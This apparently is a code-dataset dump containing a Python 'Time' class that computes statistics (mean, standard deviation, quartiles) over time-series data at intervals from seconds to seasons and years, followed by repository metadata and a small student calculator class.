of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), zeroPara=dict(hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='day',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def month(self,ratio: Union[int, float]=None,base: int=30) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='month',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def season(self,ratio: Union[int, float]=None,base: int=3) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' ''' Spring: March, April, May <br> Summer: June, July, August <br> Autumn: September, October, November <br> Winter: December, January, February ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='season',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def year(self,ratio:Union[int, float]=None,base:int=12) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), zeroPara=dict(month=1,day=1,hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='year',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def get(self,parameter: str=None) -> Union[list, dict, np.ndarray]: ''' export the data from Time factory. Arguments: parameter: select the return parameter. enum: None: { time, data, counts }, config, time, data, counts Returns: select parameter data set. ''' if parameter=='config': return self.config if (parameter==None) and (self.config['asDict']): return dict(time=self.time, data=Time._set_header(self.data,header=self.header), counts=self.counts) if parameter=='time': return self.time if parameter=='data': return Time._set_header(self.data,header=self.header) if parameter=='counts': return self.counts print("Please select the return parameter or set config['asDict']=True.") if __name__ == "__main__": # Implement the object myobj = Time() # Input data import datetime, random st = datetime.datetime(2020,1,1) number = 50000 time = [st+datetime.timedelta(hours=val) for val in range(number)] data = [[random.gauss(10,5) for _ in range(4)] for _ in range(number)] myobj.input(time,data,header=['a','b','c','d']) # Calculate and Get result # myobj.hour(1,500) myobj.set_config(outputPara_list=['mean','std','max','quartile']) myobj.season() myobj.set_config(asDict=True) result = myobj.get() print(result)
43.578808
159
0.554951
#!/bin/python3 # if used ubuntu 20.10 or later, interpreter set as #!/bin/python and use pip instead of pip3 # =================================================================== # # platfrom check # dateutil check and import try: from dateutil.relativedelta import relativedelta except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "dateutil"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "dateutil"]) else: raise "Unknow platform, please install 'dateutil' by yourself." from dateutil.relativedelta import relativedelta # =================================================================== # # platfrom check # numpy check and import try: import numpy as np except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "numpy"]) else: raise "Unknow platform, please install 'numpy' by yourself." import numpy as np # =================================================================== # import datetime from typing import Union class Time(object): ''' storageForward: True -> storage value in starttime <br> storageForward: False -> storage value in endtime ''' def __init__(self): self.set_config(init=True) def _check_data(self): if not "self.time" in locals(): raise "Please check input time." if not "self.data" in locals(): raise "Please check input data." return True @staticmethod def _set_ndarray(data): if isinstance(data,dict): for key in data.keys(): data[key]=np.array(data[key]) else: data=np.array(data) return data @staticmethod def _set_header(data,header=None): ''' only used to format output data ''' # ----------------------------------------------------------- # # here i'm not sure what data type i need to use. # thus, if data=np.array(obj(dict)), then we need # to use data.item() to get the data try: data=data.item() except: pass # ----------------------------------------------------------- # if header!=None: dummy={} for i,head in enumerate(header): if isinstance(data,dict): for key in data.keys(): if i==0: dummy[key]={} dummy[key][head]=data[key][:,i] else: dummy[head]=data[:,i] return dummy return data @staticmethod def _fixTime(time,data,timeStep:dict,zeroPara:dict,storageForward:bool,outputPara_list:list, starttime:datetime.datetime=None,endtime:datetime.datetime=None): # def _fixTime(time,data,timeStep:dict,ratio:int,zeroPara:dict,storageForward:bool,starttime:datetime.datetime=None,endtime:datetime.datetime=None): ''' zeroPara: set start datetime para season enum: 1: spring 2: summer 3: autumn 4: winter ''' minTime = np.nanmin(time) if starttime==None else starttime maxTime = np.nanmax(time) if endtime==None else endtime # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] if 'season' in timeStep.keys(): dt = relativedelta(months=3) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) dummy={} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] # deal with perfix date before a new start i = Time._get_season(minTime.month) year = minTime.year if minTime.month!=12 else minTime.year+1 mask=np.where(time<datetime.datetime(year,3*i,1))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime=datetime.datetime(year,3*i,1) while minTime<=maxTime: if minTime>max(time): break mask=np.where((time>=minTime) & (time<minTime+dt))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime+=dt else: dt = relativedelta(**timeStep) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) # if ratio==None: ratio=0 dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] while minTime<=maxTime: mask = np.where((time>=minTime) & (time<minTime+dt))[0] if mask.size==0: minTime+=dt; continue tummy.append(minTime) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) minTime+=dt dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _nofixTime(time,data,parameter:str,outputPara_list:list): # def _nofixTime(time,data,parameter:str,ratio:int): ''' parameter: set the datetime parameter (second, minute ...etc) will be used to calculate season enum: 1: winter 2: spring 3: summer 4: autumn ''' season_dict = { 1: 'Winter', 2: 'Spring', 3: 'Summer', 4: 'Autumn', } if parameter.lower()=='season': time_para_list = [Time._get_season(val.month) for val in time] else: time_para_list = [eval(f"val.{parameter}") for val in time] time_para_list = np.array(time_para_list) if time_para_list.size==0: return np.array(np.nan),np.array(np.nan),np.array(np.nan) minTime = np.nanmin(time_para_list) maxTime = np.nanmax(time_para_list) # if ratio==None: ratio=0 # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] for i in range(minTime,maxTime+1): mask = np.where(time_para_list==i)[0] tummy.append(i if parameter.lower()!='season' else [time[mask[0]].year,season_dict[i]]) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _get_season(month): ''' enum: 1: winter 2: spring 3: summer 4: autumn ''' return (month%12+3)//3 @staticmethod def _QC_numbers(data,count,threshold): if threshold==None: return data count = np.array(count) data = np.array(data) mask = np.where(count<threshold)[0] data[mask,:]=np.nan return data def set_config(self,init:bool=False,**kwargs) -> None: ''' config['storageForward']: save the value at the start time or not<br> config['outputPara_list]: select output parameter [mean,std,max,min] Arguments: init: Is the initialize status? Default is False If set True, will using the init state. **kwargs: Optional, this work only init set false. config: { asDict: bool, storage: bool, fixTime: bool, zeroStart: bool, selfUpdate: bool, outputPara_list: list = [ mean, std, max, min, maxTime, minTime, quartile, median ] } ''' if init==True: self.config = dict( asDict=False, storageForward=True, fixTime=True, zeroStart=True, selfUpdate=True, outputPara_list=['mean','std','mean'] # ['mean','std','max','min','maxTime','minTime','quartile','median'], ) else: for key in kwargs.keys(): self.config[key] = kwargs[key] def input(self,time: Union[list, np.ndarray],data: Union[list, np.ndarray],dtype:object =float, ratio: Union[int, float]=None,header: list=None,starttime:datetime.datetime=None,endtime:datetime.datetime=None) -> str: ''' time <datetime> : input timelist of data <br> data <numerical>: input data array Arguments: time: list of time series data: list of data set depend on time series dtype: convert type of data elements ratio: require of the data numbers(int) or ratio(float) header: export tag of data header starttime: start of the time endtime: end of the time Returns: return 'Successfully' when process success. ''' self.time = np.array(time) self.data = np.array(data,dtype=dtype) self.ratio = ratio self.header = header self.starttime = starttime self.endtime = endtime self.counts = [] return "Successfully" def isrepeat(self) -> bool: ''' Check weather data repeat depend on time. Returns: check there has repeat datetime in the data set. ''' if len(self.time.reshape(-1))==len(set(self.time)): return False else: return True def second(self,ratio: Union[int, float]=None,base: int=1000) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), zeroPara=dict(microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='second',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def minute(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), zeroPara=dict(second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='minute',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def hour(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1) ,zeroPara=dict(minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='hour',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def day(self,ratio: Union[int, float]=None,base: int=24) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), zeroPara=dict(hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='day',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def month(self,ratio: Union[int, float]=None,base: int=30) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='month',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def season(self,ratio: Union[int, float]=None,base: int=3) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' ''' Spring: March, April, May <br> Summer: June, July, August <br> Autumn: September, October, November <br> Winter: December, January, February ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='season',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def year(self,ratio:Union[int, float]=None,base:int=12) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), zeroPara=dict(month=1,day=1,hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='year',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def get(self,parameter: str=None) -> Union[list, dict, np.ndarray]: ''' export the data from Time factory. Arguments: parameter: select the return parameter. enum: None: { time, data, counts }, config, time, data, counts Returns: select parameter data set. ''' if parameter=='config': return self.config if (parameter==None) and (self.config['asDict']): return dict(time=self.time, data=Time._set_header(self.data,header=self.header), counts=self.counts) if parameter=='time': return self.time if parameter=='data': return Time._set_header(self.data,header=self.header) if parameter=='counts': return self.counts print("Please select the return parameter or set config['asDict']=True.") if __name__ == "__main__": # Implement the object myobj = Time() # Input data import datetime, random st = datetime.datetime(2020,1,1) number = 50000 time = [st+datetime.timedelta(hours=val) for val in range(number)] data = [[random.gauss(10,5) for _ in range(4)] for _ in range(number)] myobj.input(time,data,header=['a','b','c','d']) # Calculate and Get result # myobj.hour(1,500) myobj.set_config(outputPara_list=['mean','std','max','quartile']) myobj.season() myobj.set_config(asDict=True) result = myobj.get() print(result)
595
0
106
3d40cc9af82e7caa1ec12b7d4fdc7c7db383ac10
701
py
Python
Ago-Dic-2021/diaz-delabra-erick/carpeta-practica-3/calculator.py
AnhellO/DAS_Sistemas
07b4eca78357d02d225d570033d05748d91383e3
[ "MIT" ]
41
2017-09-26T09:36:32.000Z
2022-03-19T18:05:25.000Z
Ago-Dic-2021/diaz-delabra-erick/carpeta-practica-3/calculator.py
AnhellO/DAS_Sistemas
07b4eca78357d02d225d570033d05748d91383e3
[ "MIT" ]
67
2017-09-11T05:06:12.000Z
2022-02-14T04:44:04.000Z
Ago-Dic-2021/diaz-delabra-erick/carpeta-practica-3/calculator.py
AnhellO/DAS_Sistemas
07b4eca78357d02d225d570033d05748d91383e3
[ "MIT" ]
210
2017-09-01T00:10:08.000Z
2022-03-19T18:05:12.000Z
import math
24.172414
50
0.510699
import math class Calculator: def __init__(self, a: int, b: int) -> None: self.a = a self.b = b def suma(self) -> int: return self.a + self.b def resta(self) -> int: return self.a - self.b def multiplicacion(self) -> int: return self.a * self.b def division(self) -> int: if self.b == 0: return "No se puede dividir entre 0" else: return (self.a / self.b) def raizNumero(self) -> int: if self.a < 0: return "No se puede raiz de negativos" else: return pow(self.a, (1/(self.b))) def potencia(self) -> int: return pow(self.a, self.b)
476
-4
218
f191d89902854c6a45383db6b705fc612cf47791
784
py
Python
mmdet/models/__init__.py
FelixZhang7/miemiedetection
ca44f33255e0bb9d6150044983a344fb9a288c08
[ "Apache-2.0" ]
null
null
null
mmdet/models/__init__.py
FelixZhang7/miemiedetection
ca44f33255e0bb9d6150044983a344fb9a288c08
[ "Apache-2.0" ]
null
null
null
mmdet/models/__init__.py
FelixZhang7/miemiedetection
ca44f33255e0bb9d6150044983a344fb9a288c08
[ "Apache-2.0" ]
1
2022-02-16T08:35:00.000Z
2022-02-16T08:35:00.000Z
